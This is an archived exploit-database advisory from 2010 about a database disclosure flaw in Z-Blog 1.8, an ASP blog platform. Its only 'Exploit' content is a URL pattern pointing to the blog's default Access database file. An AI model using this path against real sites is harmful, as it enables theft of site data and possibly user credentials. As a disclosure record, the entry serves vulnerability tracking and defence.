id: 10936
date: 02/15/2010
title: Z-Blog 1.8 Remote Database Disclosure Vulnerability
author: SkuLL-HacKeR
cves: 

===================================================
Z-Blog 1.8 Remote Database Disclosure Vulnerability
===================================================

============================================================================== 
        [+] Z-Blog 1.8 Remote Database Disclosure Vulnerability
==============================================================================


    [+] Author : SkuLL-HacKeR 
    [+] Site page : http://rainbowsoft.org/ 
    [+] Language: [ASP]
    [+] Big Thx : HxH

########################################################################### 

No-exploit CreW <-

===[ Exploit ]=== 
  
    [+] http://website/path/DATA/zblog.mdb 
  

###########################################################################




#  0day.today [2023-03-24]  #